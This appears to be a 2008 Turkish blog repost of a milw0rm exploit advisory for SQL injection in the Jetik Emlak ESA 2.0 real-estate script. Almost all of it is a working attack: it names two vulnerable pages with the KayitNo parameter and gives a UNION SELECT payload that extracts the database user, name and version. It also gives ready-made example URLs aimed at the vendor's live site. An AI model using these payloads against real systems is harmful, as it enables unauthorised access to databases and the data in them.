Jetik Emlak ESA 2.0 System Script Multiple Remote Sql injection

25 Eylül 2008 Perşembe

Jetik Emlak ESA 2.0 System Script Multiple Remote Sql injection

Jetik Emlak ESA 2.0 System Script Multiple Remote Sql injection

link: http://www.milw0rm.com/exploits/6549

Discovered By: ZoRLu

Exploit:

http://localhost/script_path/diger.php?KayitNo=[SQL]

http://localhost/script_path/sayfalar.php?KayitNo=[SQL]

[SQL]=

-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*

Example:

http://www.jetik.net/esa/diger.php?KayitNo=-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*

Example 2:

http://www.jetik.net/esa/sayfalar.php?KayitNo=-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*

ZoRLu | ZRL | Buffer Overflow

25 Eylül 2008 Perşembe

Jetik Emlak ESA 2.0 System Script Multiple Remote Sql injection

0 yorum:

About Me

Blog Archive

İzleyiciler

Bağlantılarım

Inj3ct0r.com